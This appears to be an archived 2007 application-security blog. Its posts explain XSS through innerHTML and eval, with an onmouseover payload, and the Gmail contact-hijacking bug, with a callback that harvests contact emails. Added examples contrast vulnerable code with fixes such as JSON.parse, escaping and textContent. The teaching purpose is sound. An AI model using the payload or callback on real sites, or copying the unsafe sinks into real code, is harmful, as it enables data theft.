
Archive for the ‘Tech Stuff’ Category

innerHTML and eval - Javascript/Ajax attacks - 101

Wednesday, January 3rd, 2007

Just to round off a discussion I was having with some AJAX developers regarding the use of the eval() function and the innerHTML property in JavaScript.

These are commonly used to populate dynamic sections of a web page without reloading the page itself (Web 2.0, as the spin doctors call it).

So, given a simple JavaScript function that rewrites the displayed text depending on what the user typed in:

<html>
<script type="text/javascript">
function changeInput()
{
    // Reads whatever the user typed and writes it into the page as HTML:
    // any markup in the input is parsed into elements, not shown literally.
    var userInput = document.getElementById('userInput').value;
    document.getElementById('elementXYZ').innerHTML = userInput;
}
</script>

<p>Welcome to the page <b id='elementXYZ'>dude</b></p>

<input type='text' id='userInput' value='Enter Text Here' />

<input type='button' onclick='changeInput()' value='Change Text' />
</html>

So a few problems here. innerHTML parses whatever it is given as HTML, so any tags in the input become real elements rather than displayed text. To make this post short and sweet (I actually need to do some real work): if we supply markup carrying an event handler that calls the evil eval(), we have XSS, such as

<a onmouseover="eval('alert(\"hi\")')">mouse over me</a>

The JavaScript function eval(STRING) executes its string argument as script. Because the code arrives as a plain string inside an event-handler attribute, the payload needs no <script> element (which innerHTML would not execute anyway), so the script portion of the payload does without "<", ">" and the like; only the surrounding tag needs them.
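As an added example (not code from the original post), the two sinks discussed above beside their safe replacements: eval() used on a server response that was meant to be data, and innerHTML used on user text that was meant to be displayed. The sample responses, the payload string and the stand-in element object are constructed here so the block runs under Node as well as in a browser.

```javascript
// Added example, not code from the original post. It puts the two sinks the
// post discusses side by side with their safe replacements:
//   1. eval() on a server response that was meant to be data, and
//   2. innerHTML on user text that was meant to be displayed.
// Runs under Node (the DOM element is a constructed stand-in) or in a browser.

// --- 1. eval() as a data parser -------------------------------------------

// Constructed sample responses. The second is "valid" to eval() but runs code
// before yielding the object; the global flag stands in for whatever an
// attacker would actually do with that execution.
const GOOD_RESPONSE = '{"name": "dude"}';
const EVIL_RESPONSE = '(globalThis.pwned = true, {"name": "dude"})';

// VULNERABLE: the 2006-era idiom for turning a response into an object.
function parseWithEval(text) {
  return eval("(" + text + ")");
}

// SAFE: JSON.parse accepts data only and throws on anything executable.
function parseWithJson(text) {
  return JSON.parse(text);
}

// --- 2. innerHTML as a text sink ------------------------------------------

// Escape the five characters that can change HTML context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => (
    { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]
  ));
}

// The post's payload (constructed): no <script> tag, just an event handler.
const PAYLOAD = '<a onmouseover="eval(\'alert(1)\')">mouse over me</a>';

// VULNERABLE: the post's changeInput() once the value has been read.
function setGreetingUnsafe(el, value) {
  el.innerHTML = "Welcome to the page <b>" + value + "</b>";
}

// SAFE when you must build markup: escape before concatenating.
function setGreetingEscaped(el, value) {
  el.innerHTML = "Welcome to the page <b>" + escapeHtml(value) + "</b>";
}

// SAFER when you only need text: textContent never parses markup.
function setNameText(el, value) {
  el.textContent = value;
}

// Runs both halves and reports what happened, so the outcome can be checked.
function demo() {
  // Constructed stand-in for a DOM element so this runs outside a browser.
  const el = { innerHTML: "", textContent: "" };

  let jsonRefused = false;
  try { parseWithJson(EVIL_RESPONSE); } catch (e) { jsonRefused = true; }
  const evalResult = parseWithEval(EVIL_RESPONSE);

  setGreetingUnsafe(el, PAYLOAD);
  const unsafeMarkup = el.innerHTML;
  setGreetingEscaped(el, PAYLOAD);
  const escapedMarkup = el.innerHTML;
  setNameText(el, PAYLOAD);

  return {
    evalRanCode: globalThis.pwned === true,   // true: eval executed the payload
    evalStillReturnedData: evalResult.name === "dude",
    jsonRefused,                               // true: JSON.parse threw instead
    unsafeMarkup,                              // carries a live <a onmouseover>
    escapedMarkup,                             // carries only &lt;a ...&gt;
    textContent: el.textContent,               // the payload, as literal text
  };
}
```

The eval() half is the one AJAX developers most often defend ("the server is trusted"); the point of the tampered response is that anything able to alter the response body, or the string before it reaches eval(), gets code execution in the page, whereas JSON.parse gives them at most a parse error.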

What Next for App Sec (Contd) - Gmail exploit

Tuesday, January 2nd, 2007

So, as we push content back onto the client, Gmail style, we get issues like this:

 http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/

Upon logging into Gmail and then visiting a malicious site, the contacts list for one's Gmail account can be downloaded. The reason is that the contact data is delivered into a client-side JavaScript object rather than as inert data: the response is script that calls a function named google() with the contact list as its argument, so a page on another origin can pull it in with a script tag (the browser sends the Gmail cookies along) and supply its own google() to read the argument. One can traverse it as follows:

function google(a) {
    // Called by the loaded contacts script with the contact list as its argument;
    // builds a space-separated list of addresses and writes it into the attacker's page.
    var emails = "";
    for (var i = 0; i < a.Body.Contacts.length; i++) {
        emails = emails + a.Body.Contacts[i].Email + " ";
    }
    document.write(emails);
}
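As an added example (not code from the original post, and not Google's code), a simulation of the bug class above and of the usual fix. The endpoint, its sample contact list and the anti-hijacking prefix are all constructed or assumed here; a script-tag include is stood in for by new Function(), which compiles the response body as a program the way a script element would.

```javascript
// Added example, not code from the original post or from Google. It simulates
// the bug class above: an endpoint answers with JavaScript that hands private
// data to a callback, so any page can load it with <script src=...> (the browser
// attaches the victim's cookies) and define the callback itself. A <script>
// include is simulated with new Function(): the body runs as a program.
// Runs under Node.

// Constructed sample of what the endpoint returns for a logged-in user.
const CONTACTS = {
  Body: { Contacts: [{ Email: "alice@example.com" }, { Email: "bob@example.com" }] },
};

// VULNERABLE shape: executable script calling a caller-chosen function.
function vulnerableResponse(data, callbackName) {
  return callbackName + "(" + JSON.stringify(data) + ");";
}

// HARDENED shape: inert JSON behind a prefix that is a syntax error as script.
// The prefix is assumed here; any string that cannot start a program works.
const ANTI_HIJACK_PREFIX = ")]}'\n";
function hardenedResponse(data) {
  return ANTI_HIJACK_PREFIX + JSON.stringify(data);
}

// The legitimate client reads the response over same-origin XMLHttpRequest
// (which a third-party page cannot do) and strips the prefix before parsing.
function readHardenedResponse(text) {
  if (!text.startsWith(ANTI_HIJACK_PREFIX)) {
    throw new Error("unexpected response framing");
  }
  return JSON.parse(text.slice(ANTI_HIJACK_PREFIX.length));
}

// The attacker's page: defines google() exactly as in the post, then includes
// the endpoint as a script. Returns what it managed to collect.
function attackerPage(responseBody) {
  const stolen = [];
  const google = (a) => {
    for (const c of a.Body.Contacts) stolen.push(c.Email);
  };
  try {
    // new Function compiles the body like a <script> element would; the
    // attacker's google() is in scope when it runs.
    new Function("google", responseBody)(google);
    return { stolen, error: null };
  } catch (e) {
    return { stolen, error: e.name };
  }
}
```

The prefix only works because the real client is on the same origin and reads the raw text through XMLHttpRequest, which a third-party page cannot do; a callback-wrapped (script) response should be reserved for data that is public anyway. Requiring a POST or a custom request header for the endpoint closes the same hole from the other side, since a script tag can send neither.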

Looks to me like we are revisiting old security issues such as client-side logic manipulation, and our clients are getting fatter, like our people, which goes against the WWW architecture model?

-ek

OWASP Live CD

Tuesday, January 2nd, 2007

The OWASP Live CD is an OWASP initiative aimed at producing a physical artifact for use by security people. It should be released very soon and will contain plenty of OWASP tools and other open source tools. It will also contain electronic versions of the OWASP guides currently published, namely The Guide (development guide) and the Testing Guide (to be released this month).

Anyone attending the next OWASP Ireland chapter meeting can get a free copy of the Live CD. Meeting TBA.

-ek

Oracle Vs SQL Server

Tuesday, January 2nd, 2007

David Litchfield (of NGS) wrote an article comparing Microsoft SQL Server and Oracle databases. here

It highlighted that both had their problems from a security standpoint. Historically I always got excited when I found an Oracle or SQL Server during a security assessment, as one could always exploit either to some degree to make for some interesting reading.

The main point is that Microsoft's SDL is having an impact on the secure development of their products (about time), and that implementing a secure SDLC (Software Development Life Cycle) and integrating security into development is still the best way to produce secure apps.

As I mentioned in my AppSec USA 2006 presentation (Seattle) here, the pen-and-patch approach is unsustainable and not good engineering (albeit a fun part of security).

I read comments on some Irish security mailing lists saying that you cannot compare SQL Server with Oracle, as Oracle is written to be multi-platform whereas SQL Server is Windows only. This is one of the problems the software industry suffers from: ignorance. Just because a product is built to run on more than one OS does not give it the right to be of inferior quality.

Software is software after all, and if a development organisation implements a secure SDLC, the underlying operating system should not matter.

What next for app Sec

Tuesday, January 2nd, 2007

Application security, Hmmmm, Who knows what is going to be the “Big One” in 2007.

We (OWASP) just finished the Testing Guide, which is currently in draft and should be out soon. It focuses mostly on server-side code, as traditionally server-side code is where the security focus has been.

With AJAX and all this asynchronous stuff, we now have "thicker clients", even though the web direction was to go "thin". We (and our code/clients) are all getting fatter again. Too many cheeseburgers in my case.

JavaScript exploits are becoming more common and very interesting, and these types of attack are great for our friend "identity theft".

Forget SQL injection or access via a vulnerable port/bypassing a firewall; the old ways are normally the best: simply steal someone's identity and suck the money from their account. I believe this "Web 2.0" model will enable more of these types of exploits to occur.